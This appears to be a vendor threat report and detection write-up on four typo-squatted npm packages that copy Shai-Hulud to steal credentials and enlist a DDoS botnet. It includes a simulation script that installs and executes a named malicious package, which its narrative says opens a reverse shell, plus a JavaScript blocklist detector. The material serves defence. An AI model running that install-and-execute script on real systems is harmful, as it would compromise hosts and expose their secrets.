Shai-Hulud Clones: TeamPCP Copycats Are Here
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Researchers uncovered four malicious npm packages that combine infostealer functionality with distributed denial-of-service capabilities. These packages impersonate popular libraries through typo-squatting and include the open-source Shai-Hulud code modified to use attacker-controlled command-and-control servers. Installing any of the packages can result in theft of credentials, exfiltration of cloud secrets, and in one case, enrollment of the infected host into a DDoS botnet. The findings underscore the growing supply-chain risk within the npm ecosystem.
Investigation
Analysts compared the chalk-tempalte package to the leaked Shai-Hulud source code and found it to be an almost exact, unobfuscated copy configured with a custom command-and-control endpoint. The remaining packages transmitted stolen data to separate malicious domains or to an IP address over port 2222, while one variant also deployed a Go-based local bot service used for DDoS activity. All four packages were published by the same npm account, strengthening the link between them.
Mitigation
Organizations should immediately remove the malicious packages from any projects and delete associated configuration artifacts from developer environments and build systems. All credentials that may have been exposed should be rotated, and network access to the identified malicious domains and IP address should be blocked. Teams should also monitor npm dependencies for typo-squatted packages that mimic the same legitimate libraries.
Response
Defenders should create detections for outbound connections to the identified command-and-control domains and IP address, alert on installation of the four malicious package names, and scan systems for the embedded public key tied to the malware. Any system that installed one of the packages should undergo forensic review to determine whether persistent services, scheduled tasks, or additional payloads were deployed.
Attack Flow
graph TB
  %% Class definitions
  classDef technique fill:#99ccff
  classDef operator fill:#ff9900
  %% Nodes
  initial_access["<b>Technique</b> – <b>T1195.002 Supply Chain Compromise</b><br/>Compromise software supply chain to gain initial foothold."]
  class initial_access technique
  automated_collection["<b>Technique</b> – <b>T1119 Automated Collection</b><br/>Collect credentials, environment variables, cloud configuration files automatically."]
  class automated_collection technique
  creds_in_files["<b>Technique</b> – <b>T1552.001 Unsecured Credentials</b><br/>Credentials stored in files are harvested."]
  class creds_in_files technique
  private_keys["<b>Technique</b> – <b>T1552.004 Unsecured Credentials</b><br/>Private keys are extracted from insecure locations."]
  class private_keys technique
  victim_identity["<b>Technique</b> – <b>T1589 Gather Victim Identity Information</b><br/>Collect personal identifiers of the victim."]
  class victim_identity technique
  victim_org["<b>Technique</b> – <b>T1591.001 Gather Victim Org Information</b><br/>Determine physical locations of the victim organization."]
  class victim_org technique
  code_repos["<b>Technique</b> – <b>T1213.003 Data from Information Repositories</b><br/>Harvest code repositories for useful data."]
  class code_repos technique
  npm_persistence["<b>Technique</b> – <b>T1176 Software Extensions</b><br/>Establish persistence via malicious npm package."]
  class npm_persistence technique
  exfil_over_http["<b>Technique</b> – <b>T1011 Exfiltration Over Other Network Medium</b><br/>Send collected data to C2 over HTTP/HTTPS."]
  class exfil_over_http technique
  cloud_transfer["<b>Technique</b> – <b>T1537 Transfer Data to Cloud Account</b><br/>Move stolen data into a cloud storage account."]
  class cloud_transfer technique
  %% Connections
  initial_access -->|leads_to| automated_collection
  automated_collection -->|collects| creds_in_files
  automated_collection -->|collects| private_keys
  automated_collection -->|collects| victim_identity
  automated_collection -->|collects| victim_org
  automated_collection -->|collects| code_repos
  automated_collection -->|collects| npm_persistence
  creds_in_files -->|exfiltrates| exfil_over_http
  private_keys -->|exfiltrates| exfil_over_http
  victim_identity -->|exfiltrates| exfil_over_http
  victim_org -->|exfiltrates| exfil_over_http
  code_repos -->|exfiltrates| exfil_over_http
  npm_persistence -->|exfiltrates| exfil_over_http
  exfil_over_http -->|stores_in| cloud_transfer
Detections
- Suspicious Executable Download (via proxy)
- Possible Vscode Automatic Tasks Configuration File Created In Unusual Directory [MACOS] (via file_event)
- Remote File Upload / Download via Standard Tools (via cmdline)
- Possible Vscode Automatic Tasks Configuration File Created In Unusual Directory [LINUX] (via file_event)
- Hidden File Was Created On Linux Host (via file_event)
- Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
- Possible Schtasks or AT Usage for Persistence (via cmdline)
- Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via cmdline)
- Suspicious Binary / Scripts in Autostart Location (via file_event)
- Possible IP Lookup Domain Communications Attempted (via dns)
- Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
- Possible Crontab Usage for Direct Execution (via cmdline)
- IOCs (SourceIP) to detect: New Actors Deploy Shai-Hulud Clones: TeamPCP Copycats Are Here
- IOCs (DestinationIP) to detect: New Actors Deploy Shai-Hulud Clones: TeamPCP Copycats Are Here
- Detection of Outbound Network Connections to Shai-Hulud C2 Servers [Firewall]
- Detection of Malicious NPM Package Execution [Windows Process Creation]
- Detection of Malicious npm Package Execution [Linux Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
- Initial Recon (optional): The attacker enumerates the victim's Node.js environment to confirm npm is present.
- Malicious Package Acquisition: The attacker downloads a malicious npm package that mimics a legitimate utility (e.g., @deadcode09284814/axios-util).
- Installation & Execution: Using a single line, the attacker installs the package globally and immediately executes a JavaScript payload that opens a reverse shell.
- Persistence (beyond scope): The attacker could add the malicious package to package.json for future re-use.
Regression Test Script: The script reproduces steps 2-3 exactly, generating the command line strings that the Sigma rule matches.
#!/usr/bin/env bash
# malicious_npm_execution.sh
# -------------------------------------------------
# 1️⃣ Ensure Node.js runtime is present
if ! command -v node >/dev/null 2>&1; then
  echo "[*] Installing Node.js and npm"
  sudo apt-get update && sudo apt-get install -y nodejs npm
fi

# 2️⃣ Install the malicious npm package (simulated)
# (Replace with a real malicious package in a real test)
MALICIOUS_PKG="@deadcode09284814/axios-util"
echo "[*] Installing malicious package: $MALICIOUS_PKG"
npm install -g "$MALICIOUS_PKG"

# 3️⃣ Execute a payload that the package ships with
# npm already ran the package's postinstall script during step 2; requiring
# the package here executes its entry point and produces the "node -e"
# command line the rule matches. Globally installed packages are not on
# Node's default resolution path, so NODE_PATH is pointed at the global root.
echo "[*] Triggering malicious payload"
NODE_PATH="$(npm root -g)" node -e "require('$MALICIOUS_PKG');"

# 4️⃣ Optional: Keep the shell alive for observation
sleep 30
echo "[*] Test completed"
# -------------------------------------------------
Cleanup Commands: Remove the malicious package and any generated files.
#!/usr/bin/env bash
# cleanup_malicious_npm.sh
# -------------------------------------------------
echo "[*] Removing malicious npm package"
npm uninstall -g "@deadcode09284814/axios-util" || true
# Clear npm's download cache so the fetched package tarball is not retained locally
rm -rf "$HOME/.npm/_cacache"
echo "[*] Cleanup complete"
# -------------------------------------------------
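To show what the Linux process-creation detection has to match, here is an added example (not the vendor's Sigma rule) that evaluates constructed process events shaped like the command lines the regression script above generates. The blocklist holds only the two package names that appear on this page; the events, pids and rule names are constructed.

```javascript
// Added example (not the vendor's Sigma rule): a minimal detection over constructed
// Linux process-creation events shaped like what the regression script generates.
// The blocklist holds the two package names that appear on this page.
const MALICIOUS_PACKAGES = ["chalk-tempalte", "@deadcode09284814/axios-util"];

// Constructed sample telemetry: benign install, malicious install, inline require, noise.
const SAMPLE_EVENTS = [
  { pid: 101, ppid: 1, image: "/usr/bin/npm", cmdline: "npm install -g typescript" },
  { pid: 102, ppid: 1, image: "/usr/bin/npm", cmdline: "npm install -g @deadcode09284814/axios-util" },
  { pid: 103, ppid: 1, image: "/usr/bin/node", cmdline: "node -e require('@deadcode09284814/axios-util');" },
  { pid: 104, ppid: 1, image: "/bin/ls", cmdline: "ls -la" },
];

// Package argument of "npm install|i|add [flags...] <pkg>", or null.
function installedPackage(cmdline) {
  const m = /\bnpm\s+(?:install|i|add)\b(?:\s+-\S+)*\s+(\S+)/.exec(cmdline);
  return m ? m[1] : null;
}

// Package named inside a "node -e require('...')" one-liner, or null.
function inlineRequiredPackage(cmdline) {
  const m = /\bnode\s+(?:-e|--eval)\s+.*require\(['"]([^'"]+)['"]\)/.exec(cmdline);
  return m ? m[1] : null;
}

// Evaluate every event against both patterns; one alert per matching pattern.
function detectMaliciousNpm(events, blocklist = MALICIOUS_PACKAGES) {
  const alerts = [];
  for (const ev of events) {
    const installed = installedPackage(ev.cmdline);
    if (installed && blocklist.includes(installed)) {
      alerts.push({ rule: "malicious_npm_install", pid: ev.pid, package: installed });
    }
    const required = inlineRequiredPackage(ev.cmdline);
    if (required && blocklist.includes(required)) {
      alerts.push({ rule: "malicious_npm_inline_require", pid: ev.pid, package: required });
    }
  }
  return alerts;
}

console.log(detectMaliciousNpm(SAMPLE_EVENTS));
```

Exact-name matching is the precise part of this rule; in production, feed the blocklist from the IOC set and keep the inline-require pattern as a lower-confidence signal, since legitimate one-liners also use node -e.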